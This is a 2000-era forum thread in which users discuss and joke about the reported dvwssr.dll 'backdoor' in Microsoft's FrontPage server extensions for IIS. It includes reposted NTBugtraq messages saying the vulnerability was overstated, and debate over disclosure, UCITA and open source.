Is it any surprise that the official mouthpeice for corporatism thinks that Microsoft runs "almost all" Web servers? The whole FSOS (Fres Software / Open Source) movement almost necessarily falls below the radar of corporatists. If it doesn't cost anything, and it can't be charged as a loss-leader, then it must not be important.

It is, in fact, this blindness that makes corporatism (a) so evil and (b) so futile in the long run. There are values that are not economic values, and they do have the strength to compete.

If it were open source ...

[Dhericean]

we could all see what the password is.

Can we get a backdoor for Apache?

[lbrlove]

I propose a new backdoor in the Apache code. It would work something like this:

When the user types "Bill Gates is a fungus covering the streets of the cyber village" to a logged site, the server immediately spawns new processes which scour the Web looking for vulnerable IIS servers.

Upon finding these sites, it does nothing. Why would you need to do anything to a machine that runs (Af)front Page Extensions?! It already suffers from enough code-bloat to make any amount of bandwidth nearly useless.

-L

Actual report - not as bad as it looked

[davew]

Russ Cooper just posted a more educated summary of the problem to NTBUGTRAQ. It's in the archives at this location.

It's NOT as bad as first reported. Russ says that his comment that it affects "almost every web hosting provider" was based on the info that it was some sort of Front Page issue. It's not that simple, and it seems that it's only exploitable by users who have already been granted web authoring permissions on the box.

Have fun,
Dave

--

Russ Cooper says "NO VULNERABILITY"

[IntlHarvester]

Here's hoping this is high enough on the page that people see it. The /. story should probably be updated.

From: Windows NTBugtraq Mailing List [NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]
on behalf of Russ [Russ.Cooper@RC.ON.CA]
Sent: Friday, April 14, 2000 12:33 PM
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: DVWSSR.dll Vulnerability in Microsoft IIS 4.0 Web Servers

Ok, here's a breaking update.

Latest reports say that there is

NO VULNERABILITY IN DVWSSR.DLL

Yup, that's right, different again from what I said earlier, and even more
different than what I said yesterday to WSJ.

Please accept that I have followed the story published elsewhere and tried
to keep you abreast of everything I knew. Also appreciate that the amount of
time given to verify and research the claims made by others has been
extremely short. I've had probably 30 interviews today by orgs pressing for
information on the story as the feeding frenzy occurs after the first one
goes to press (WSJ in this case).

MS have had people working on this thing like madmen, trying to verify the
claims and investigate all of the possible pieces of code that may be
affected. As that research progressed, different observations were made and
so the story came out in various stages (with varying levels of
"correctness"). Had they been given a reasonable amount of time to respond,
nobody would have been in a tizzy about anything (i.e. the press would not
have cared to run this story anywhere).

Decide for yourself whether we were better served by (more) immediate
disclosure or not. I've stood where I stand for a reason, despite the
loathing of others for my stance...

In the end, it turns out that unless you actually have permissions for the
file you are requesting, you'll get an error message when you follow the
procedures outlined by RFP in his RFP2K02 advisory.

That said, understand that sites that allow connections by Front Page may
very well provide you with source asp if you request it. BUT THAT WILL
HAPPEN with or without the .dll. Without proper and full permissions applied
across virtual servers on a given box, site leakage or manipulation by
others will always be possible in myriad ways.

>From what I've heard/seen/been told, permissions on the test servers must
have either been non-existent, incorrectly applied, or permissioned the user
across multiple virtual sites (i.e. incorrectly applied).

I had someone claim that they could get into an FP98 site using
"Netscapeengineersareweenies!" as a userID and no password...making them
think it was a backdoor userID. Fact is they could get into the same sites
using "TomDickandHarry" as a userID too. If the permissions aren't set
correctly, anything is possible.

This info may change again before its finalized. It may well be that there
is some way to use this .dll in a way that's not intended...it just doesn't
appear to be this one. On a box where multiple sites have not been
individually permissions, or permissions are lax or non-existent...anyone
permissioned to execute the .dll in the first place would have the ability
to simply open the other sites and manipulate them directly (i.e. no need to
do this junk with the dvwssr.dll)

Finally, to my point out the string not being a password. Elias Levy of
SecurityFocus.com and Mark Edwards of NTSecurity.net have both correctly
pointed out that using the term password to apply to that string is not
beyond the realm of understanding. The client component mtd2lv.dll and the
server component dvwssr.dll both need to know this value, and use it
correctly, for communications to work. If you try and talk directly to
dvwssr.dll and don't obfuscate your communication with the correct "key", it
won't understand you. Of course if you don't already have permissions,
knowing this value gets you nothing...hence my observation that its not a
password. Whatever it is, it appears to be meaningless junk text used as
data.

Cheers,
Russ - NTBugtraq Editor
"dot-age" (as in "we're in the dot-age") = senility (source Webster's)

--

Here's the dealio.

[Zico]

Microsoft has a Security Bulletin and a FAQ about the problem. Although it's limited, there is a vulnerability -- nothing like those password scenerios that have been bandied about, however.

Quick summary: If multiple web sites are hosted on a NT4/IIS4 server with FrontPage 98 extensions installed, then webmaster A with web authoring permissions on his own site could potentially inappropriately read the .asp (and possibly the global.asa, but no others) files of webmaster B's web site if he knew where they existed on the same server. Note that to be able to do this, user B would have had to have granted user A read permissions (explicitly, or by giving read access to "Everyone") on those files -- otherwise, user A would be unable to read the files.

Soooo, this looks like a tremendously smaller problem than everyone originally thought, although there definitely is a vulnerability for the scenario I mentioned above. Corrections welcomed if I munged any of that explanation.

Cheers,
ZicoKnows@hotmail.com

Looks like there never was a backdoor (read below)

[Zico]

This was posted to the NTbugtraq list by Russ, the owner. If true, there are a whole damn lot of Slashdotters who made fools of themselves jumping to conclusions today. That's all I'll say about that, so, on with the post (sorry for the bold, and the entire repost, but it needs to be seen):

======= BEGIN MESSAGE =========

Ok, here's a breaking update.

Latest reports say that there is

NO VULNERABILITY IN DVWSSR.DLL

Yup, that's right, different again from what I said earlier, and even more different than what I said yesterday to WSJ.

Please accept that I have followed the story published elsewhere and tried to keep you abreast of everything I knew. Also appreciate that the amount of time given to verify and research the claims made by others has been extremely short. I've had probably 30 interviews today by orgs pressing for information on the story as the feeding frenzy occurs after the first one goes to press (WSJ in this case).

MS have had people working on this thing like madmen, trying to verify the claims and investigate all of the possible pieces of code that may be affected. As that research progressed, different observations were made and so the story came out in various stages (with varying levels of "correctness"). Had they been given a reasonable amount of time to respond, nobody would have been in a tizzy about anything (i.e. the press would not have cared to run this story anywhere).

Decide for yourself whether we were better served by (more) immediate disclosure or not. I've stood where I stand for a reason, despite the loathing of others for my stance...

In the end, it turns out that unless you actually have permissions for the file you are requesting, you'll get an error message when you follow the procedures outlined by RFP in his RFP2K02 advisory.

That said, understand that sites that allow connections by Front Page may very well provide you with source asp if you request it. BUT THAT WILL HAPPEN with or without the .dll. Without proper and full permissions applied across virtual servers on a given box, site leakage or manipulation by others will always be possible in myriad ways.

From what I've heard/seen/been told, permissions on the test servers must have either been non-existent, incorrectly applied, or permissioned the user across multiple virtual sites (i.e. incorrectly applied).

I had someone claim that they could get into an FP98 site using "Netscapeengineersareweenies!" as a userID and no password...making them think it was a backdoor userID. Fact is they could get into the same sites using "TomDickandHarry" as a userID too. If the permissions aren't set correctly, anything is possible.

This info may change again before its finalized. It may well be that there is some way to use this .dll in a way that's not intended...it just doesn't appear to be this one. On a box where multiple sites have not been individually permissions, or permissions are lax or non-existent...anyone permissioned to execute the .dll in the first place would have the ability to simply open the other sites and manipulate them directly (i.e. no need to do this junk with the dvwssr.dll)

Finally, to my point out the string not being a password. Elias Levy of SecurityFocus.com and Mark Edwards of NTSecurity.net have both correctly pointed out that using the term password to apply to that string is not beyond the realm of understanding. The client component mtd2lv.dll and the server component dvwssr.dll both need to know this value, and use it correctly, for communications to work. If you try and talk directly to dvwssr.dll and don't obfuscate your communication with the correct "key", it won't understand you. Of course if you don't already have permissions, knowing this value gets you nothing...hence my observation that its not a password. Whatever it is, it appears to be meaningless junk text used as data.

===== END MESSAGE ======

Cheers,
ZicoKnows@hotmail.com

Re:haha..

[stx23]

And from the properties dialog:-
Microsoft Design Tool - Link View
It's installed by Front Page Server Extensions 3.0. 'The FrontPage Extensions manage design-time Web permissions using the underlying security model of the host operating system on the server.'
From MSDN

A request to fetch the source code for an ASP file without processing, for example, to view the links in that file, is handled by that Web's dvwssr.dll.

Presumably the magic phrase can override permissions to expose the source code. It's ::$DATA all over again.

actually...

[griffjon]

well, what you say actually could be enforced under the DMCA. I'll wager that the FP EULA doesn't allow users to decompile or strings it.

And really, it wasn't JUST encrypted backwards, it had a full double-ROT13 encryption applied before that, so even after de-backwardsing it, you still would have to take it through two rounds of ROT13 before it was readable.

Re:actually...

[Sloppy]

Two rounds of ROT13 is still incredibly weak, though. All the crypto experts recommend at least 16 rounds, and with processors being so fast these says, I usually do 64 rounds.

---

Two Points...

[Evro]

Without having read all these comments, I apologize if these points are redundant. However...

• With UCITA in effect, wouldn't MS be completely within its right by putting backdoors in its software? And wouldn't MS be able to sue the WSJ reporters for exposing this flaw?
  
• Right here we can see why MS will never open their source code. Perhaps they even put this backdoor in on purpose so that they could say to the Justice Department, "Look, if you open the source code up, all these bugs/backdoors will be exposed, and every site running Win2k will be destroyed. So you can't open the source, for the good of the Web." Far-fetched perhaps, but it seems like the kind of tactic they might use.
  

I think this discovery may have much farther-reaching implications that anybody presently realizes.

__________________________________________________ ___

Thus proving...

[Black+Parrot]

Thus proving that the closed source model is, in fact, more secure than the open source model?

--

Re:So what does the file do then?

[Black+Parrot]

I'm not finding much info. Google only has a couple of useful hits, and they turn out to be essentially the same. Check out t he MS reference page and read the section entitled "Web Application Level". (Read it carefully, because the bit about changing ACLs is apparently not the function of the .dll in question.)

dvwssr.dll is described as a "gatekeeper" for browsing, which would make sense if it is where the backdoor code lies. It is apparently part of the "FrontPage Server Extensions". The table at the link gives the .dll's location for systems running NT with NTFS, so that's all I can deduce about who's exposed.

Oh, and I can't resist this quote from the linked page:

Security for Web applications is a complicated subject because it can be set at several levels in several different ways.

One more level and one more way than it was supposed to, eh?

--

(OT) how were DES S boxes picked?

[Tau+Zero]

They might have been classified at first, but the reasons have been rediscovered independently. What were rediscovered independently? I'm glad you asked me that. After the discovery of differential cryptanalysis by academic cryptographers, an investigation of DES found that the S boxes were highly resistant to this technique. The original IBM scheme, using 64-bit keys, would have also allowed many weak keys to be used. The S boxes were designed by the NSA, proving that the NSA's cryptographers knew of differential cryptanalysis and how to make cyphers resistant to it years before the technique was discovered by people working in the public sphere.

"Not cracked yet" happens to be the acid test for cryptosystems. Anything which has been open to public scrutiny and attack for years without being cracked is more trustworthy than something which has not. DES is losing usefulness because hardware is now fast enough to do brute-force attacks at reasonable cost, but that's something we knew would happen. If you have secrets you need to protect for the ages, you don't use DES anyway. The tradtional way of protecting these things is to use bullets, though the US government is a little bit more sophisticated; to protect some secrets known by a dying CIA director, he was scheduled for neurosurgery which destroyed his speech centers before his scheduled Congressional subcommittee appearance. Not exactly subtle, but clever.

(Is there anyone who doesn't shiver when they think of the stuff like this that spooks do?)
--

Heaven's Gift?

[wouter]

This seems as a heaven's gift to me for all those "security through obscurity doesn't work" advocates. We know they're right, but this event - if it is entirely true, and gets headlined in many media - would certainly help management understand that something might be wrong with their perception of how to handle security.

Surely, this event won't mean that suddenly every company will switch to an open source solution, but i firmly believe that this event is one of the many steps that happen in the evolution of perception of software and its uses.

This won't result in a sudden increase in the usage of Linux, FreeBSD or any other open source solution... It's just all matter of evolution...

... If it is solid... I mean, this sounds too good to be true, not?

Anyway, i'm on my way telling my manager "told you so!" :)

So what does the file do then?

[Raindeer]

If you can delete the file dvwssr.dll this easily, without any repercussions, I wonder what it did there in the first place.

Re:So what does the file do then?

[Guru+Meditation]

The .dll in question is part of the Frontpage extensions:

The FrontPage Extensions manage design-time web permissions using the underlying security model of the host operating system on the server. Here we consider only the case where this operating system is Windows NT 4.0 with the NTFS file system.
FP manages administer and author access to a web using the same technique. In the web's root directory, FP creates a directory named _vti_bin. Within this directory it creates two sub-directories, _vti_adm and _vti_aut. Within _vti_adm FP places a file, admin.dll, and within _vti_aut it places two files, author.dll and dvwssr.dll. These DLLs are ISAPI extensions. During design-time, client requests arrive over HTTP at the server and are routed to one of these ISAPI DLLs.
A request to perform an administrative function, for example, change permissions on a web, is handled by that web's admin.dll.
A request to perform an authoring function, for example, open a web, is handled by that web's author.dll.
A request to fetch the source code for an ASP file without processing, for example, to view the links in that file, is handled by that web's dvwssr.dll.
In the request, the client provides credentials that identify the user who is logged in to the client workstation. This user must have read permission (equivalent to read and execute individual permissions) for the DLL handling the request, otherwise the request is denied. Thus FP restricts who may perform a given request by controlling read permission on the directories in _vti_bin. Whenever a change is made to a web's permissions via the Web Permissions dialog box, the FP Extensions on the server modify the ACLs on the directories _vti_adm and _vti_aut in that web's _vti_bin directory accordingly. Note: FP does not change ACLs on content files to manage design-time security; it only changes ACLs on the directories which contain the gatekeeper files admin.dll, author.dll, and dvwssr.dll. FP manipulates content file ACLs to manage run-time security.
----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
----------

Well done

[heikkile]

That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!), thus playing right into the hands of the open-source-is- good-for-security argument, and no-one at MS noticed it... the mind boggles.

Here's my theory: Not everyone at MS is happy working there, and some may even be friendly to Open Source. Instead of (or just before) leaving the Evil Empire they decide to leave a small present. Once safely out, they tip off a journalist in one of the papers that can hurt MS the most.

If nothing else, this shows a clear hole in MS quality control procedures. If this sort of feelings are common inside MS, they may well be running into more serious problems than anything DOJ can give them...

Re:Now that's professional...

[Ron+Harwood]

Actually, the more I think about this, the more it irritates me.

Believe it or not, using Visual Interdev is a pretty standard thing with not UNIX web-dev shops... and to come along and say - "oh yeah, we screwed this up because it was funny" is just insane. I cannot fathom what the programmers at MS are thinking.

And to say that "well, it doesn't affect 2000" is no better. I have to ask at that point, "Why? Did you come up with something even funnier for 2000?"

Eric S. Raymond said just this week that the open source model has one strength that closed source truly lacks, and can never have - peer review. All other "professional" endeavours of this magnitude have it (civil engineering was his example) and those professions are all the better for it.

If there was even one iota of external peer review, this "feature" (and you can't call something that was placed there on purpose a bug) would never have seen the light of day.

Re:I know the phrase...

Actually, at offset 0xe00 in dvwssr.dll you will find something like "Netscape engineers are weenies!" in reverse. And also the filename "/global.asa" which I have no idea what it means since I don't use windows. (I found dvwssr.dll using ftpsearch, just to take a look at it.)

/AC

Risk, Accountability, and Interstate Commerce

[Effugas]

You know, it's funny. BugTraq recently posted news of a covert backdoor(obfuscated code, etc.) embedded in some minor commercial CGI out there. I considered posting it to Slashdot, but since once of the core magnifiers of a security breach is its universality(and I really didn't think that many people were using the script), I didn't think it'd get through the submission queue.

Looks like Microsoft solved *that* problem for me, eh?

They'll try to spin it, but there's really no good way to announce that there's a mission critical backdoor distributed in what appears to be an otherwise useless file. Assume the normal best case scenario: Some temp checked in the code on a lark.

So, that basically means some temp that checks in code on a lark can insert a mission critical security hole that will affect hundreds of thousands of businesses and millions of consumers.

Move up the chain. If it was a low grade employee who did it...if it was a small group of humorists angry about their easter egg being quelled...if Bill Gates himself did it and only he knew...worst case scenario, if Microsoft itself has no idea where this came from, but it got there...

Then anyone sufficiently powerful can insert a globally available backdoor.

The only defense? Microsoft was merely building in functionality allowing it to exercise its rights under UCITA to deny service to EULA violating customers(like websites that provide benchmarking statistics!).

Now, I'm no Congressman, but when a company in Washington State is backing state bills that let it shut down a company in New York State, that sure sounds to me like a rather inappropriate regulation of Interstate Commerce. Say what you will about the abuse of federal powers vs. state rights; UCITA's one scheme that would have been used to hold Microsoft's portion of the Internet Economy hostage to a humorously named but cryptographically bare passphrase that any 14 year old with half a brain could find.

If they've got a right to shut down software remotely, they've got a right to put in the backdoor that does it. That's how they were planning to get out of this disaster, which I'm sure they've known about for quite some time.

We need federal protection against those who would sell us malicious code by pushing corrupt state laws through the legislatures. UCITA was born when it failed to pass congressional muster; it failed to pass for a very good reason. In an age when the Interstate Commerce clause has been abused to no end, millions of Americans must now worry about billions of dollars of their money being stolen by anyone running a Microsoft server. The company will put on a valiant show, but while one face is talking customer protection, the other is lobbying as hard as it can to eliminate any rights customers might have against such attacks.

Microsoft is no longer invincible; fighting its legislative agenda is no death sentence. This intentionally released security hole clearly illustrates just what kinds of dangers UCITA opens up to the American consumer, for beyond even the simple analysis that Microsoft could claim this to be their legally protected implementation of a granted right...UCITA also bolsters Microsoft's right to sue whoever even looks for such a security hole, on the basis of a signed away right to reverse engineer.

You can't find the bugs. You can't demand the bugs be removed. You can't even tell anyone about the bugs. If this isn't a restriction of Interstate Commerce--among several other well cherished rights--I don't know what is.

Yours Truly,

Dan Kaminsky
DoxPara Research
http://www.doxpara.com

haha..

[FORTYoz]

david@cold:~ > strings dvwssr.dll
... bunch of crap..
/global.asa
.asp
!seineew era sreenigne epacsteN
HTTP/1.0 404 Object Not Found
.. more crap ..

see the hidden message? hint.. its backwards.

Re:Windows 98

[Orlando]

"Apparently if you play the Windows NT CD backwards you hear satanic messages"
"You think that's bad, if you play it forwards it installs Windows NT!"

orlando...

Affects "almost every Web-hosting provider."

[nhowie]

So M$'s bug affects Apache then? ;-P
--

ESR is wrong??

[EasyTarget]

Eric S. Raymond said just this week that the open source model has one strength that closed source truly lacks, and can never have - peer review. All other "professional" endeavours of this magnitude have it (civil engineering was his example) and those professions are all the better for it.

Closed source development where quality is a focus does have quite a lot of review, by peers, and others. And the whole process (architecture, design, code and test) is fully reviewed in a structured method that ensures that everything is covered, not just the 'gee wizz' bits.

HOWEVER, this is not how Micro$oft and most other 'software houses' work.. It is used by places that truely care about software quality (NASA for instance). I used to work for Motorola developing for safety-critical systems, and peer review was very strong. I was a sysadmin and I was subject to review!

Check out the CMM (Capability Maturity Model) from the SEI. Compare it with the list of things that most of us consider open source strengths, you might be surprised. If done right, it allows bug free (and I do mean free, as in no signifigent bugs at all!) development.

Just because the likes of Micro$oft cannot be bothered to use this stuff, does not mean that closed source can -never- deliver quality or security. It just costs more.


EZ
-'Press Ctrl + Alt + Delete to log on..'

Windows 98

[vbrtrmn]

I heard that if you install Windows 98 backwards, it works.

--

Ye gods.

[Bob+Ince]

we don't know yet exactly which software is affected: IIS, FrontPage, or both.

The CBS article makes this clearer: it is the IIS FrontPage extensions.

I'm really, really having trouble believeing this.

That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!), thus playing right into the hands of the open-source-is-good-for-security argument, and no-one at MS noticed it... the mind boggles.

There's nothing up on microsoft.com about it yet either, which also strikes me as strange. Is this really true? If so, it must be the security howler of the year.

I personally can't check if it works as a backdoor, since on the NT web server here I deliberately de-installed all the crap IIS wants you to have (unnecessary script mappings, example sites, web admin, FrontPage extensions...). Contrary to what some sysadmins seem to think, security does not lie in keeping all the Microsoft default settings.

Jesus wept. Prepare for a lot of defaced web sites.

--
This comment was brought to you by And Clover.

Put down the mouse and step away from the keyboard

[Anomalous+Canard]

That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!),

The plaintext is encrypted by writing it backwards in the .dll. By decrypting this copyrighted text, you have violated Section 1201 of the DCMA. Come along quietly and no one will get hurt.

Anomalous: inconsistent with or deviating from what is usual, normal, or expected

Heres the offending dll

[cheekymonkey_68]

Heres a link to the file dvwssr.dll for those who still think its a belated April Fool